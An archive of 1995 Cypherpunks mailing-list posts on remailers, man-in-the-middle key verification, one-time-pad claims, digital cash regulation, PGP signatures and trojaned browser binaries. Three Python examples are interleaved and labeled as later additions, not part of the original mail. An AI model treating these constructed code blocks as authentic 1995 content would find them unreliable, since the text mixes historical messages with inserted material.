E-mail: mlm@skyrr.is & mlm@rhi.hi.is




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@valhalla.phoenix.net>
Date: Wed, 11 Oct 95 11:47:06 PDT
To: cypherpunks@toad.com
Subject: IMPORTANT: Valhalla is leaving alias.net domain!!
Message-ID: <Pine.SUN.3.91.951011133632.262A-100000@valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


NOTICE: valhalla.phoenix.net is leaving the alias.net domain! Please
change your entries from remailer@spook.alias.net and
wmono@spook.alias.net to remailer@valhalla.phoenix.net and
wmono@valhalla.phoenix.net accordingly. Apparently double-domaining
valhalla in SunOS 4.1.3 causes severe DNS problems that I can't explain at
this time. I apologize for the inconvenience.

Raph, can you change the entry to your remailer list accordingly ASAP??

John Perry - KG5RG
perry@valhalla.phoenix.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Valhalla Remailer <remailer@valhalla.phoenix.net>
Date: Wed, 11 Oct 95 11:58:09 PDT
To: cypherpunks@toad.com
Subject: Updated Key for Valhalla
Message-ID: <Pine.SUN.3.91.951011135442.673A-100000@valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



Here is the updated key for valhalla to reflect the new address.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 11 Oct 95 11:01:18 PDT
To: David Murray <sdavidm@iconz.co.nz>
Subject: Re: Banque des Cypherpunks
In-Reply-To: <pnr828410657q@iconz.co.nz>
Message-ID: <Pine.SUN.3.91.951011135717.10037A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, David Murray wrote:

> A bank isn't going to last long if the SEC can just take its 'deposits'. 
> Fortunately there are still a number of jurisdictions left where the bank's
> bank account should be safe.

Use k-out-of-n secret sharing to split digital coins among hundreds of
pseudo-banks spread throughout the world, so that governments would have
to make a large number of raids to shut it down. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 11 Oct 95 12:01:42 PDT
To: don@cs.byu.edu
Subject: Re: MITM garbage
In-Reply-To: <199510110408.WAA00256@wero.byu.edu>
Message-ID: <199510111901.PAA15377@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes:
>So, if you ask me, none of _those_ methods are very trustworthy considering
>the resources you have to have already assigned to Mitch - after all, 
>keeping a 24 hour Medussawatch on you and your whole ISP is tough work. 
>Going _through_ Mitch is not easy.

I agree.  The whole of the post to which you responded was directed to
the point that MITM is virtually impossible in the real world.  Since
as little as one successful communication can reveal his presence,
Mitch must cover *all* avenues his victims may use.

>>The chance of failure is minimized by diversity in the channels used to
>>try to bypass the MITM. 
>
>I agree-On the other hand, it's not terribly difficult to go _around_
>Mitch.  I mean, just how many of the following things has Mitch done:
>Watch all the ISP's in town and all the phone lines you can use to call
>them.  Filter your work/school ISPs. Filter all your net-using neighbors,
>co-workers, and friends' accounts. etc. All it takes is to get one
>non-Mitch public key. 

Once again.  That's what I said.  "Going around Mitch" is another way
of saying "using (yet) another channel", one which you haven't tried
before, meaning more diversity in the channels.

>>you can't afford a failure, you *do* need a channel over which you have
>>nearly complete control.  The simplest such channel is a physical
>>meeting, during which you exchange public keys.  If the MITM threat is
>
>How do you know you're not giving your key to Mitch. And how do you know
>that Mitch isn't headed over to Alice's later on to pretend to be you and 
>give Alice "your" key?

This goes back to the issue of why you care about the identity of the
key owner.  Presumably you have some knowledge of Alice which may be
verified by physical presence, or Alice carries some credentials which
are sufficiently difficult to forge.  Barring something like this,
though, you *can't* know whether there's a MITM --- but barring prior
knowledge of Alice, you don't care who's behind the key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 11 Oct 95 11:12:45 PDT
To: jim@acm.org
Subject: Re: Elementrix POTP
In-Reply-To: <199510111708.KAA09582@mycroft.rand.org>
Message-ID: <9510111810.AA21080@all.net>
MIME-Version: 1.0
Content-Type: text


> > Sorry to continue "beating a dead horse" here, but I forwarded a few
> > C-punks' messages regarding the Elementrix "Power One-Time Pad" to
> > this person, and I thought you might be interested in her (somewhat
> > cryptic <g>) response.
...

> Except for one thing, i.e. this line from the last blather:
> 
> >The encryption is not done by using an encryption algorithm.
> 
> 'Nuff said for now, I think.

Not quite enough for my taste.  If this system can be uniquely initiated
by a finite sequence of bits transferred between the two parties and can
be used to encrypt more than that many bits, it is not a one-time-pad -
period - full stop.

By definition, the information content of a one-time-pad is one bit per
bit of transmitted information.  If a finite number of bits is enough to
initialize this system, then by definition, it ceases to be a
one-time-pad as soon as one more than that many bits have been
transmitted using those bits as the initialization key.  This is a
direct result of information theory, and cannot be circumvented by any
amount of wizardry or genius.

Even if you found that information theory is palpably inconsistent, the
definition of a one-time-pad (as defined by Shannon in his second most
famous 1949 paper) is in terms of information theory, and therefore, the
end of the theory is also the end of the definition of a one-time-pad.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
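
The counting argument above can be checked by brute force at toy sizes. This is an added example, not part of the original message: it compares a real pad with a keystream expanded from a short seed. The SHA-256 based generator stands in for any deterministic seeded system and is an assumption, as are all names and sizes.

```python
import hashlib


def expand(seed, nbits):
    """Deterministic keystream of nbits bits derived from a seed.

    Assumption: SHA-256 is used only as a stand-in generator. The argument
    holds for any deterministic function of the seed.
    """
    digest = hashlib.sha256(seed.to_bytes(4, "big")).digest()
    return int.from_bytes(digest, "big") >> (256 - nbits)


def seeded_keystreams(seed_bits, msg_bits):
    """Every keystream the seeded system can ever produce."""
    return {expand(s, msg_bits) for s in range(2 ** seed_bits)}


def pad_keystreams(msg_bits):
    """Every keystream of a true one-time pad: one key bit per message bit."""
    return range(2 ** msg_bits)


def plaintexts_consistent_with(ciphertext, keystreams):
    """Plaintexts an eavesdropper cannot rule out after seeing ciphertext."""
    return {ciphertext ^ k for k in keystreams}


def surviving_fraction(seed_bits, msg_bits, plaintext, seed):
    """Fraction of the message space still possible under the seeded system."""
    ciphertext = plaintext ^ expand(seed, msg_bits)
    survivors = plaintexts_consistent_with(
        ciphertext, seeded_keystreams(seed_bits, msg_bits)
    )
    if plaintext not in survivors:
        raise RuntimeError("true plaintext must always survive")
    return len(survivors) / 2 ** msg_bits


if __name__ == "__main__":
    # One bit more than the seed: at least half of all messages are excluded.
    print("8-bit seed,  9-bit message:", surviving_fraction(8, 9, 0x155, 0x42))
    # Twice the seed length: at most 256 of 65536 messages remain.
    print("8-bit seed, 16-bit message:", surviving_fraction(8, 16, 0xBEEF, 0x42))
    # True pad: every 16-bit message remains possible.
    c = 0xBEEF ^ 0x1234
    print("16-bit pad survivors:",
          len(plaintexts_consistent_with(c, pad_keystreams(16))))
```
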



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 10 Oct 95 22:10:45 PDT
To: garnett@wombat.catbelly.com (Santiago de la Paz)
Subject: Re: PC disk wipe software
In-Reply-To: <199510110113.TAA08320@wombat.catbelly.com>
Message-ID: <199510110319.AA32344@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


Crypto  relevance: None.
Privacy relevance: High.

>> Often files retrieved include e-mail thought to have been
>> erased long ago. It survives because the diligent
>> computer system manager makes backup tapes of everything
>> on the system every night, then stores those tapes for
>> years.
>
>Uh... they back up their *mail* spools?  Yeah, right.

machine:/home/mark/.elm mark> grep mbox elmrc
receivedmail = /home/mark/mail/mbox
sentmail = /home/mark/mail/mbox.out

People do record their incoming and outgoing email. Smart ones will store it
offsite (auto forward to their home machine). Others will pgp them online.
Mostly though the cleartext email files will be happily archived away each
night to the nice friendly DAT tape down the corridor in the machine room.

This is also a situation on PC and Mac POP clients. They can be configured to
record your email as it goes in and out. Here we also backup the PC's each
night to a DAT. That's why it's important to self sanitize your files.

Me, I just nuke any sensitive information that may arrive in my work mbox,
or save/forward it to a safer place. I discourage people from using my work
address as a regular personal contact point.

Also ensure your admins aren't the nosy types. I started work at one place
and noticed in the /.sh_history file that the previous admin was regularly
grepping people's mail spools for his name. This caused some concern to the
management when they were informed. Obviously these forays were not part of
his everyday job and were a personal endeavour.

Cheers,
Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Wed, 11 Oct 95 12:01:37 PDT
To: Christopher Klaus <cklaus@iss.net>
Subject: Re: Announcement: Alert Mailing List
In-Reply-To: <199510092303.QAA16855@iss.net>
Message-ID: <9510111901.AA07166@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    From: Christopher Klaus <cklaus@iss.net>
    Date: Mon, 9 Oct 1995 16:03:28 +1494730 (PDT)

    Announcing a new security mailing list - The Alert.

    The Alert will be covering the following topics:

    	- Security Product Announcements
    	- Updates to Security Products
    	- New Vulnerabilities found
    	- New Security Frequently Asked Question files.
    	- New Intruder Techniques and Awareness

This sounds a lot like bugtraq.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 15:09:10 PDT
To: cypherpunks@toad.com
Subject: regulation of money transmitters
Message-ID: <v02120d12aca1f5229110@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I just had a very pleasant conversation with the California
State Banking Department; they are sending me copies of the
relevant laws, and applications for the necessary licenses
to sell negotiable instruments and transmit money overseas.
I spoke with an examiner and she didn't seem to think there was
anything special about them being _digital_ negotiable
instruments.

Apparently it involves a $5,000 non-refundable application fee,
background investigations, examination of the soundness of the
corporation, and the posting of a bond proportional to the
anticipated volume (updated if volume is larger.) All very
reasonable.

Those who might be interested in actually doing something with
this information should contact Alicia Adoc at (415) 263 8549,
or the banking department in the applicable state.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Wed, 11 Oct 95 07:51:18 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510111418.PAA22841@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



> Two years ago, I pointed out that getting a single message past
> the man in the middle isn't good enough; you have to convince your
> readers that the key they received on one channel is more accurate
> than the key they're receiving on all the other channels.
> But if they'll believe that, they may also believe the man in the middle's
> announcement that the key in your name on all the keyservers is
> wrong, and the correct key is the one he's putting out.
> Can't win either way, but it's still important to get the key out.
> 
> My current key is 0x54696D4D; the fingerprint is 
> 4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.

but this is not Tim May's key, his key is:

pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28 


And this one is signed by these people:

pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
sig       8F898631             Scott Collins (512) <Scott_Collins@genmagic.com>
sig       E972F011             E. Dean Tribble <tribble@xanadu.com>
sig       4C131F57             Tim Oren <oren@apple.com>
sig       F5257117             <tomj@wps.com>
sig       85197FB5             John Gilmore <gnu@cygnus.com>


at level two in the web of trust are these people:

pub   512/F5257117 1992/09/28 <tomj@wps.com>
sig       B1331439             Randy Bush <randy@psg.com>
                              Tom Jennings <tomj@fido.wps.com>
sig       DA0EDC81             Phil Karn <karn@unix.ka9q.ampr.org>
sig       F572C6A7             Jim Cannell <Jim.Cannell@f21.n216.z1.fidonet.org>
sig       0BD91A2D             Phil Karn <karn@unix.ka9q.ampr.org>
sig       F5257117             <tomj@wps.com>
                              Tom Jennings <tomj@fidosw.fidonet.org, 1:125/111>
sig       ADF733A9             Jesse David Hollington <1:225/1.1@fidonet.org>
sig       4D077463             Steve Matzura <steve.matzura@f203.n2603.z1.fidonet.org>
sig       E7F23D95             Mike Laster <1:170/300.23@fidonet>
sig       DB910037             Barry Kapke <96:101/33@dharma>
sig       5B77854F             Depository #1 [Public Keys]
sig       08F811DD             Marcos R. Della <mdella@polyslo.calpoly.edu>
sig       212EC54B             Guy Martin 1:143/269 (guy.martin@f269.n143.z1.fidonet.org)
sig       F572C6A7             Jim Cannell <Jim.Cannell@f21.n216.z1.fidonet.org>
sig       BDFB1F2D             George Gleason <gg@well.sf.ca.us>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
sig       8F898631             Scott Collins (512) <Scott_Collins@genmagic.com>
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       E972F011             E. Dean Tribble <tribble@xanadu.com>
sig       4C131F57             Tim Oren <oren@apple.com>
sig       85197FB5             John Gilmore <gnu@cygnus.com>
sig       DA27EC35             Wes Perkhiser <wes.perkhiser@weise.omahug.org>
sig       E7960501             Paul Schencke <1:135/340@fidonet.org>
sig       9DB252DF             Mike Riddle
sig       734B9A59             Christopher Baker <1:374/14@fidonet.org>
sig       B1B6B823             GK Pace @ 1:374/26 <gk.pace@f26.n374.z1.fidonet.o

pub  1024/85197FB5 1992/11/08 John Gilmore <gnu@cygnus.com>
sig       5ACB1C6D             (Unknown signator, can't be checked)
sig       15100C27             (Unknown signator, can't be checked)
sig       DA0EDC81             Phil Karn <karn@unix.ka9q.ampr.org>
sig       0BD91A2D             Phil Karn <karn@unix.ka9q.ampr.org>
sig       9F9F38BB             Mark Eichin <eichin@athena.mit.edu>
sig       5B415621             Mark Eichin <eichin@paycheck.cygnus.com>
sig       66CE89B7             Mark Eichin <eichin@cygnus.com>
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       BDFB1F2D             George Gleason <gg@well.sf.ca.us>
sig       DDBE0DD5             John T. Draper <crunch@netcom.com>
sig       8F898631             Scott Collins (512) <Scott_Collins@genmagic.com>
sig       0245C435             Dave Krieger <dkrieger@netcom.com>
sig       4C131F57             Tim Oren <oren@apple.com>
sig       E972F011             E. Dean Tribble <tribble@xanadu.com>
sig       F5257117             <tomj@wps.com>
sig       71946BDF             Phil Karn <karn@qualcomm.com>


If you knew any of the level 1, or level 2 signatories personally and
had exchanged keys face to face, you'd have some assurance.


Also this level 3:

pub  1024/DA0EDC81 1994/07/25 Phil Karn <karn@unix.ka9q.ampr.org>
sig       ED2354B9             Ulla Sandberg <ulla@stupi.se>
sig       9C57B951             Peter Lothberg <roll@stupi.se>
sig       C7A966DD             Philip R. Zimmermann <prz@acm.org>

PRZ, as your PGP distribution is probably signed by this key, unless
you've inspected the source personally, you're relying on this key
anyway.


Level 4 would be a big web as lots of people fan out from PRZ.
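
The level-by-level walk above can be automated. The following is an added example, not part of the original message: it parses a key listing in the format shown and computes how many signature hops separate each signer from a target key. The listing embedded here is an excerpt of the lines in the message; the function names are assumptions.

```python
import re
from collections import deque

# Excerpt of the listing quoted in the message above.
LISTING = """\
pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       F5257117             <tomj@wps.com>
sig       85197FB5             John Gilmore <gnu@cygnus.com>

pub   512/F5257117 1992/09/28 <tomj@wps.com>
sig       B1331439             Randy Bush <randy@psg.com>
                              Tom Jennings <tomj@fido.wps.com>
sig       DA0EDC81             Phil Karn <karn@unix.ka9q.ampr.org>
sig       F5257117             <tomj@wps.com>

pub  1024/85197FB5 1992/11/08 John Gilmore <gnu@cygnus.com>
sig       DA0EDC81             Phil Karn <karn@unix.ka9q.ampr.org>
sig       0022E52D             Eric Hughes <hughes@soda.berkeley.edu>
sig       F5257117             <tomj@wps.com>

pub  1024/DA0EDC81 1994/07/25 Phil Karn <karn@unix.ka9q.ampr.org>
sig       ED2354B9             Ulla Sandberg <ulla@stupi.se>
sig       C7A966DD             Philip R. Zimmermann <prz@acm.org>
"""

PUB = re.compile(r"^pub\s+\d+/([0-9A-F]{8})\s")
SIG = re.compile(r"^sig\s+([0-9A-F]{8})\s")


def parse_listing(text):
    """Map each listed key ID to the key IDs that signed it, in listing order.

    Self-signatures are dropped and alias lines (no pub/sig prefix) ignored.
    """
    signers = {}
    current = None
    for line in text.splitlines():
        m = PUB.match(line)
        if m:
            current = m.group(1)
            signers.setdefault(current, [])
            continue
        m = SIG.match(line)
        if m and current is not None:
            sid = m.group(1)
            if sid != current and sid not in signers[current]:
                signers[current].append(sid)
    return signers


def signer_levels(signers, target):
    """Breadth-first search outward from target through its signers."""
    level, parent = {target: 0}, {target: None}
    queue = deque([target])
    while queue:
        key = queue.popleft()
        for sid in signers.get(key, []):
            if sid not in level:
                level[sid] = level[key] + 1
                parent[sid] = key
                queue.append(sid)
    return level, parent


def chain(signers, target, trusted):
    """Shortest listed signature chain from a key you trust to target.

    Returns None when no chain exists. This reads a listing only: each
    signature still has to be verified cryptographically, and 32-bit key
    IDs can collide, so compare full fingerprints before relying on a hop.
    """
    level, parent = signer_levels(signers, target)
    if trusted not in level:
        return None
    path = [trusted]
    while parent[path[-1]] is not None:
        path.append(parent[path[-1]])
    return path


if __name__ == "__main__":
    graph = parse_listing(LISTING)
    print(chain(graph, "54E7483F", "C7A966DD"))
    print(chain(graph, "54696D4D", "C7A966DD"))
```
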





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 11 Oct 95 12:19:42 PDT
To: cypherpunks@toad.com
Subject: FWD>sig du crypt
Message-ID: <v02120d02aca1c3e3ad7c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>Date: 11 Oct 1995 11:04:04 -0800
>From: "Vinnie Moscaritolo" <Vinnie_Moscaritolo@quickmail.apple.com>
>Subject: FWD>sig du crypt
>To: "Bob Hettinga" <RAH@shipwright.com>
>
>Mail*Link(r) SMTP               FWD>sig du crypt

>>(forwards factored out)
>>
>>Sig found in sci.crypt:
>>
>>--
>>Eric Norman
>>
>>        "Congress shall make no law restricting the size of integers
>>        that may be multiplied together, or the number of times that
>>        an integer may be multiplied by itself, or the modulus by
>>        which an integer may be reduced".
>>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Wed, 11 Oct 95 07:26:49 PDT
To: Cypherpunks@toad.com
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510111345.AA046029137@hp001c.skyrr.is>
Message-ID: <199510111424.PAA12627@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


If the next challenge is advertised with time enough, I have a spare
MasPar I could use.

I've been considering porting brutessl to it for a while, but never 
actually tried. Maybe I could have time to do it... That would be real
fun!

OTOH I'm about to leave my current job. Maybe I won't have the time...
But I could try. <:-)

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 11 Oct 95 07:28:44 PDT
To: cypherpunks@toad.com
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510111414.KAA27374@panix.com>
Message-ID: <Pine.SOL.3.91.951011152652.1754F-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Oct 1995, Duncan Frissell wrote:

> At 01:45 PM 10/11/95 +0000, Magnus Logi Magnusson wrote:
> 
> Anyone working on self-reporting win32 client?
> 
> Try:
>
> http://www.brute.cl.cam.ac.uk/ftp/pub/brute/w32clnt.zip

It's not (yet) self-reporting.

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 16:07:06 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510111604.AA06660@cantina.verity.com>
Message-ID: <307C4D2F.150B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Patrick Horgan wrote:
> 
> > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> >
> > This one is _really ripe_ for a response to the editor.  Ideas?
> >
> > We could start something off-list if there are several interested in
> > co-authoring.
> >
> I'd love to see something in there about most commercial sites being behind
> firewalls without nfs access across the firewall.  This greatly reduces the
> risk from the nfs problems.  If you get your binary via nfs from a trusted
> host inaccessible from the internet, then if you have this problem management
> can handle it as an employee problem;)  There are ways to make secure
> firewalls, it's fairly well understood.  Sometimes people point to things
> like the hack Mitnick did last Christmas, but his attack took advantage of
> a couple of things a security expert shouldn't have allowed, first and
> foremost two machines were accessible from the internet, and one of them
> trusted root logins from the other without a password:(

  It might also be worth noting that people accessing the net
via an ISP from home do not typically use NFS either.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip J. Nesser" <pjnesser@rocket.com>
Date: Wed, 11 Oct 95 17:03:05 PDT
To: jsw@netscape.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C4D2F.150B@netscape.com>
Message-ID: <199510120001.RAA17707@oac1.rocket.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: Jeff Weinstein <jsw@netscape.com>
>Date: Wed, 11 Oct 1995 16:03:11 -0700

>Patrick Horgan wrote:
>> 
>> > From: "K. M. Ellis" <kelli@zeus.towson.edu>
>> >
>> > This one is _really ripe_ for a response to the editor.  Ideas?
>> >
>> > We could start something off-list if there are several interested in
>> > co-authoring.
>> >
>> I'd love to see something in there about most commercial sites being behind
>> firewalls without nfs access across the firewall.  This greatly reduces the
>> risk from the nfs problems.  If you get your binary via nfs from a trusted
>> host inaccessible from the internet, then if you have this problem management
>> can handle it as an employee problem;)  There are ways to make secure
>> firewalls, it's fairly well understood.  Sometimes people point to things
>> like the hack Mitnick did last Christmas, but his attack took advantage of
>> a couple of things a security expert shouldn't have allowed, first and
>> foremost two machines were accessible from the internet, and one of them
>> trusted root logins from the other without a password:(

>  It might also be worth noting that people accessing the net
>via an ISP from home do not typically use NFS either.

>	--Jeff

It might be even better to note that the amount of NFS traffic that passes
outside of a given local network/geographical area is small.  NFS does
reasonably poorly from a performance perspective over WAN connections in
general so most organizations don't use it for more than local area use.
WUarchive allowed it for a while but it was infinitely slow compared to
ftp.  I suspect that a protocol analysis of a major interchange point
(MAE's, NAP's, etc) would show NFS traffic at far less than 1% of the
total.  

The NFS threat should be delegated to that class of problems which are
characterized as locally insecure, which can be easily exploited by a
malicious user (internal or external who has broken in), locally useful,
something which can be made better (kerberos version for example), but
generally isn't for ease of use.

--->  Phil


(BTW my 'mount ftp.netscape.com:/pub /mnt' command failed for some reason,
can you look into it :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Date: Wed, 11 Oct 95 17:05:45 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307C4D2F.150B@netscape.com>
Message-ID: <199510120005.RAA01681@moosehead.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Patrick Horgan wrote:
> > 
> > > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> > >
> > I'd love to see something in there about most commercial sites being behind
> > firewalls without nfs access across the firewall.  This greatly reduces the
> 
>   It might also be worth noting that people accessing the net
> via an ISP from home do not typically use NFS either.
> 

They don't often have the skill/knowledge/concern to verify a PGP checksum
to ensure someone didn't patch their browser, either.

People seem to miss that the NFS hack was only an _example_ of a powerful
way to silently destroy the integrity of an executable. Spoofing the
insecure FTP session they used to retrieve it works. Sending them a random
trojan horse works. The point was not that NFS is insecure. It was that
unless you can authenticate your executables as being trustworthy NOTHING
ELSE MATTERS.

SSL, good RNGs for session key selection, etc, are all null
and void if you run (any) untrusted software that patches
your Netscape executable, for example, or if you got a bum copy to
start with.

Paul



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 11 Oct 95 17:12:37 PDT
To: cypherpunks@toad.com
Subject: Re: Checksums for current beta versions of Netscape Navigator
In-Reply-To: <199510110921.CAA29849@ammodump.mcom.com>
Message-ID: <307C5C84.78A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg wrote:
> 
> 'sabout time.
> 
> In article <199510110921.CAA29849@ammodump.mcom.com>,
> Jeff Weinstein  <jsw@netscape.com> wrote:
> >  This file was signed using my private key.  It can be obtained from
> >my web page using this URL:
> >
> >       http://home.netscape.com/people/jsw/my-pgp-key.txt
> 
> He put his private key on his web page?  Um, maybe not... :-)

  Sorry.  It was late.  It was signed with my private key.  The
public key that can be used to verify the signature can be obtained
from...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
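
The check that this message and Paul Gauthier's earlier one both point at, comparing a downloaded executable against a published checksum list, is sketched below as an added example that is not part of either message. It assumes the list's PGP signature has already been verified with the publisher's public key, and it assumes SHA-256 digests in "digest  filename" lines; the file names and contents are constructed.

```python
import hashlib
import hmac
import os
import tempfile


def parse_manifest(text):
    """Parse '<64 hex chars>  <filename>' lines into {filename: digest}.

    Malformed or duplicate entries raise ValueError rather than being
    skipped, so a damaged list cannot silently shrink what gets checked.
    """
    entries = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"line {lineno}: expected digest and filename")
        digest, name = parts[0].lower(), parts[1].lstrip("*")
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"line {lineno}: not a SHA-256 hex digest")
        if name in entries:
            raise ValueError(f"line {lineno}: duplicate entry for {name}")
        entries[name] = digest
    return entries


def file_digest(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify(path, manifest):
    """True only if the file is listed and its digest matches (fails closed)."""
    expected = manifest.get(os.path.basename(path))
    if expected is None:
        return False
    return hmac.compare_digest(file_digest(path), expected)


def demo():
    """Return (intact file, patched file, unlisted file) verification results."""
    with tempfile.TemporaryDirectory() as d:
        binary = os.path.join(d, "browser.bin")
        with open(binary, "wb") as f:
            f.write(b"\x7fELF constructed sample executable" * 100)
        manifest = parse_manifest(f"{file_digest(binary)}  browser.bin\n")
        intact = verify(binary, manifest)

        # Simulate a silent one-byte patch after the list was published.
        with open(binary, "r+b") as f:
            f.seek(10)
            f.write(b"\x00")
        patched = verify(binary, manifest)

        other = os.path.join(d, "unlisted.bin")
        with open(other, "wb") as f:
            f.write(b"constructed file that is not in the list")
        unlisted = verify(other, manifest)
    return intact, patched, unlisted


if __name__ == "__main__":
    print(demo())
```
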




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 11 Oct 95 17:11:06 PDT
To: cypherpunks@toad.com
Subject: Re: Banque des Cypherpunks
Message-ID: <v02120d03aca218e0cb4b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>aba@atlas.ex.ac.uk writes:
>>Technologically it would be possible to have multiple ombudsmen, or
>>even have the recovery key be secret share split amongst ecash users
>>in such a way that some chosen percentage of agreement would be
>>required before cash could be traced, or revoked (made worthless).
>

I need to make the legal situation plainer:

This is an all or nothing situation. Dirty money is dirty money.
If the host government(s) decide that your institution was willfully
blind to the transmission of dirty money, they can seize substitute
assets. I'm not saying _should_, I'm not saying that there aren't
fairer ways, but any and all assets in "cooperating" countries _will_
become fair game if the government decides you've let your institution
be used for money laundering.

This property may be transitive -- if another institution knows or should
have known that your institution knows or should have known that the
money was dirty, _they_ may find their assets in cooperating countries
seized. Furthermore, as I mentioned in Part the Second, countries are
blatantly paid off for cooperating. In fact, Munroe mentioned after his
talk that the Swiss are among the very quickest to freeze assets, although
they are very slow to unfreeze them....

I'm not saying there aren't clever ways around this -- it's an arms
race, and one that bankers, regulators and LEAs perceive themselves to
be losing. Nevertheless, I don't think that anyone, regardless of their
intentions, should get involved in international money transmission
unless they are fully aware of the tools and techniques that may be
brought to bear against them.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Oct 95 09:20:28 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape & Fortessa
Message-ID: <199510111620.RAA25682@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Netscape to Offer Fortezza Cryptographic Capability for
Its Software Products

Underscores Company's Commitment to US Government Market


Mountain View, Calif., Oct. 10 -- Netscape Communications
Corporation announced today its intent to support the
